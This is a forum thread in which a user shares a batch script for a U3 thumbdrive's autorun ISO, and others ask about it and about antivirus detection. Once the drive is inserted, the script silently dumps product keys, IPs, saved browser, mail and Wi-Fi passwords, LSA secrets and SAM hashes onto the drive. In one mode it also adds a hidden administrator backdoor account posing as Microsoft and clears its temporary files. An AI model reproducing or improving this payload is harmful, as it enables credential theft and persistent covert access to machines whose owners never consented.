My U3 Batch

[MrTRiX]

I just turn this into a ISO and burn it to the U3. The thumbdrive can remain totaly empty and it will still work. The way I have it setup is so that it reads all the drive volume labels and looks for a certain string. My U3 thumbdrive is named "2 GB (1)" the 1 stands for mode 1 in which it just gets password/key data and nothing else. 2 installs the remote user and 0 just runs launchpad. This will have to be modified a bit for each user but its prety straight forward. Also I didn't post any links to the programs cause there easy to find but if you have trouble finding one just ask.

@ECHO OFF

FOR %%A IN (C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (

FOR /F "tokens=1-8" %%1 IN ('VOL %%A:') DO (

IF %%6%%7%%8 EQU 2GB^(0^) (

START %%A:U3LauncherLaunchU3.exe

)

IF %%6%%7%%8 EQU 2GB^(1^) (

SET USBDrive=%%A

)

IF %%6%%7%%8 EQU 2GB^(2^) (

SET BackDoor=1

SET USBDrive=%%A

)

)

)

IF NOT DEFINED USBDrive EXIT

ECHO #####################################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve Microsoft Product Keys ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ProduKey.exe /stab %TEMP%ProduKey.txt

TYPE %TEMP%ProduKey.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve WAN IP ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

wget.exe -t1 -T1 -q http://dynupdate.no-ip.com/ip.php -O %TEMP%wanip.txt

TYPE %TEMP%wanip.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve LAN IP ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO #####################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ipconfig.exe>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ################################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve Program Passwords ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ################################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

iepv.exe /stab %TEMP%iepv.txt

mailpv.exe /stab %TEMP%mailpv.txt

mspass.exe /stab %TEMP%mspass.txt

netpass.exe /stab %TEMP%netpass.txt

pspv.exe /stab %TEMP%pspv.txt

WirelessKeyView.exe /stab %TEMP%WirelessKeyView.txt

TYPE %TEMP%iepv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%mailpv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%mspass.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%netpass.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%pspv.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

TYPE %TEMP%WirelessKeyView.txt>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ############################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve LSA Passwords ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ############################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

LSASecretsDump.exe>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ########################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Retrieve SAM Files ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ########################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

PwDump.exe 127.0.0.1>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

IF DEFINED BackDoor (

ECHO ##########################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ## Create Backdoor User ##>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO ##########################>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

NET USER /ADD SUPPORT_388945a1 password /FULLNAME:"Microsoft Corporation">>%USBDrive%:PC_%COMPUTERNAME%.txt

NET LOCALGROUP Administrators SUPPORT_388945a1 /ADD>>%USBDrive%:PC_%COMPUTERNAME%.txt

REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /V SUPPORT_388945a1 /T REG_DWORD /D 0 /F>>%USBDrive%:PC_%COMPUTERNAME%.txt

ECHO.>>%USBDrive%:PC_%COMPUTERNAME%.txt

)

REM ############################

REM ## Delete Temporary Files ##

REM ############################

DEL /F /Q %TEMP%ProduKey.txt

DEL /F /Q %TEMP%ip.php

DEL /F /Q %TEMP%iepv.txt

DEL /F /Q %TEMP%mailpv.txt

DEL /F /Q %TEMP%mspass.txt

DEL /F /Q %TEMP%netpass.txt

DEL /F /Q %TEMP%pspv.txt

DEL /F /Q %TEMP%WirelessKeyView.txt

It seems to work without error but I would love suggestions on improvment if you have any.

[Moo]

wait, so does this not use a go.cmd?

or am i misunderstanding

[MrTRiX]

This is a replacement for go.cmd. You turn this into a .cmd and put it on the iso with all the tools. Then name the thumbdrive part 2 GB (0) or whatever u want as long as its <something> *space* <something> *space* (0,1,2)/

[spektormax]

this is eseicanly the spektormax payload just redone, it has the exact same fucntionalty.. stay tune for ICBM

[pseudobreed]

The only reason people never "burned" the payload into the iso is so that you can edit it on the fly and not have to reformat your USB Drive to update the new payload.

The only thing I would "burn" would be static files. However, really this does not have any advantage.

[Moo]

would this still be picked up by antivirus programs?

[pseudobreed]

would this still be picked up by antivirus programs?

Yes. It's not the batch is the problem, it's the applications being used to enumerate the information.

However, the antivirus will not be able to remove the file, just not allow the OS to run it.